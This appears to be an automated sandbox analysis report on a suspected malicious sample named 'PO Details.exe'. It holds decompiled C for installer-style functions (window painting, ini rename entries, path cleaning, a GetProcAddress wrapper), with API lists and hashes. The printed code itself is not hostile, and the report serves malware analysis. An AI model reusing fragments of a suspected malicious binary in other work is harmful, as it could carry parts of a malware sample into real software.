Instruction Fuzzy Hash: 79618EB1A00209FFDB109F60DD85AAA7B69FB85314F00843AFA15B72D1D778AD51CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f14;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
Instruction ID: eaab19ccb9cda740c31967da28403833e1322962c0e6ee158e4036cb66a51054
Opcode Fuzzy Hash: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
Instruction Fuzzy Hash: ED418B71800209AFCF058FA5CE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040605D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040605D(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040644E(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f14 + 0x128)));
						_t12 = E00405F07(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405F8A(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405E6C(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405E6C(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405EC2(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405FB9(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405F07(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x0040605d
0x00406066
0x0040606d
0x00406077
0x0040608b
0x004060b3
0x004060be
0x004060c2
0x004060e2
0x004060e9
0x004060f3
0x00406100
0x00406105
0x0040610a
0x0040610e
0x0040611d
0x0040611f
0x0040612c
0x00406130
0x004061cb
0x00000000
0x00406146
0x00406153
0x00406177
0x0040617b
0x0040619a
0x0040619e
0x0040619e
0x004061a0
0x004061a9
0x004061b4
0x004061bf
0x004061c5
0x00000000
0x004061c5
0x0040617d
0x00406180
0x0040618b
0x00406187
0x00406189
0x0040618a
0x0040618a
0x00406192
0x00406194
0x00000000
0x00406194
0x0040615e
0x00406164
0x00000000
0x00406164
0x00406130
0x0040610e
0x0040608d
0x00406098
0x004060a1
0x004060a5
0x00000000
0x00000000
0x004060a5
0x004061d6

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061F8,?,?), ref: 00406098
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004060A1

Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE

GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004060BE
wsprintfA.USER32 ref: 004060DC
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00406117
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406126
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040615E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004061B4
GlobalFree.KERNEL32(00000000), ref: 004061C5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061CC

Part of subcall function 00405F07: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\PO Details.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
Part of subcall function 00405F07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D

Strings

%ls=%ls, xrefs: 004060D2
[Rename], xrefs: 00406146, 00406158

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 2734070b275057de67ac1042ac82e2258b5e7089bd79c64c1e0f06eaf1381cfe
Instruction ID: d46549913b6b20842cf1787bef5cc60fb31ae9cbf3b8bb231415db86ef2d3bba
Opcode Fuzzy Hash: 2734070b275057de67ac1042ac82e2258b5e7089bd79c64c1e0f06eaf1381cfe
Instruction Fuzzy Hash: 9D3135712017157BD2206B218D48F6B3A5CDF45754F15003AFE82FA2C3DA3CE9218ABD

Uniqueness

Uniqueness Score: -1.00%

Function 004066C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004066C0(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405D5D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405D13(L"*?|<>/\":", _t5))) == 0) {
							E00405EC2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004066c2
0x004066cb
0x004066e2
0x004066e2
0x004066e9
0x004066f5
0x004066f5
0x004066f8
0x004066fb
0x00406700
0x00406702
0x0040670b
0x0040670f
0x0040672c
0x00406734
0x00406734
0x00406739
0x0040673b
0x0040673e
0x00406743
0x00406744
0x00406748
0x00406748
0x00406749
0x00406750
0x00406752
0x00406759
0x00000000
0x00000000
0x00406761
0x00406767
0x00000000
0x00000000
0x00000000
0x00406767
0x0040676c

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,76693420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO Details.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406723
CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406732
CharNextW.USER32(?,00000000,76693420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO Details.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406737
CharPrevW.USER32(?,?,76693420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO Details.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 0040674A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004066C1
*?|<>/":, xrefs: 00406712
"C:\Users\user\Desktop\PO Details.exe" , xrefs: 004066C0

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\PO Details.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-508098749
Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
Instruction ID: 9627fccf098e727a5900f08bdddf05a21b4f43d755832024a56349c67539c63f
Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
Instruction Fuzzy Hash: F2110D1580061295DB303B548C84A7B62F8EF5879CF52843FED96732C0E77D8C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 004043CE Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004043CE(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004043e0
0x00404496
0x00000000
0x00404496
0x004043f1
0x004043f5
0x00000000
0x0040440f
0x0040440f
0x00404418
0x00000000
0x00000000
0x0040441a
0x00404426
0x00404429
0x00404429
0x0040442f
0x00404435
0x00404435
0x00404441
0x00404447
0x0040444e
0x00404451
0x00404454
0x00404456
0x00404456
0x0040445e
0x00404464
0x00404464
0x0040446e
0x00404473
0x00404476
0x0040447b
0x0040447e
0x0040447e
0x0040448e
0x0040448e
0x00000000
0x00404491

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043EB
GetSysColor.USER32(00000000), ref: 00404429
SetTextColor.GDI32(?,00000000), ref: 00404435
SetBkMode.GDI32(?,?), ref: 00404441
GetSysColor.USER32(?), ref: 00404454
SetBkColor.GDI32(?,?), ref: 00404464
DeleteObject.GDI32(?), ref: 0040447E
CreateBrushIndirect.GDI32(?), ref: 00404488

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
Instruction ID: dd0feedb065fecc26b382c70af4fe1a3d395924493241b124500faa7aa9dc668
Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
Instruction Fuzzy Hash: 7C2174B15007059BCB30DF78DA08B5BBBF8AF81714B05892EE992B26E1D734E904DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00404D22 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D22(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404d30
0x00404d3d
0x00404d43
0x00404d81
0x00404d81
0x00404d90
0x00404d97
0x00000000
0x00404d99
0x00404d45
0x00404d54
0x00404d5c
0x00404d5f
0x00404d71
0x00404d77
0x00404d7e
0x00000000
0x00404d7e
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D3D
GetMessagePos.USER32 ref: 00404D45
ScreenToClient.USER32(?,?), ref: 00404D5F
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D71
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D97

Strings

f, xrefs: 00404D73

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 7205eec21020573454be23e67ac2b5f41aa1c09cc3aa20a5ad054807a565c042
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 63014C71900219BADB00DBA4DD85BFEBBBCAF54B11F10012BBA50F61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D1C(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D1C(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040644E(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406358();
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402630
0x0040156d
0x00402b08
0x00402bc5
0x00402bd1

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84
CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Strings

Tahoma, xrefs: 00401EB9

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: f7d2c4ede39cd1ebf9a9ca480a1e70309c94da774c50f234bb5eb93d3cfe4977
Instruction ID: 39ccdc2dc8d2035913c0323839c6798354fd507b9908b2fcb43e3dcb67b0f82d
Opcode Fuzzy Hash: f7d2c4ede39cd1ebf9a9ca480a1e70309c94da774c50f234bb5eb93d3cfe4977
Instruction Fuzzy Hash: C6019271904240EFE7005BB0EE4AB9A3FB4BB15300F208A3AF141B75E2C6B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 6E49161D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E49161D(char _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t3 =  &_a4; // 0x6e492238
				_t7 = GetProcAddress( *_t3, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x6e491637
0x6e491643
0x6e491650
0x6e491653
0x6e491657
0x6e491660
0x6e49166c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E492238,?,00000808), ref: 6E491635
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E492238,?,00000808), ref: 6E49163C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E492238,?,00000808), ref: 6E491650
GetProcAddress.KERNEL32(8"In,00000000), ref: 6E491657
GlobalFree.KERNEL32(00000000), ref: 6E491660

Strings

8"In, xrefs: 6E491653

Memory Dump Source

Source File: 00000001.00000002.9314657277.000000006E491000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E490000, based on PE: true

Associated: 00000001.00000002.9314566108.000000006E490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314713092.000000006E494000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314753504.000000006E496000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e490000_PO Details.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID: 8"In
API String ID: 1148316912-2762155471
Opcode ID: c8185c7f1af49426c8239fea4623afeb8e8f70946cac9bc730e89d453d50e4fa
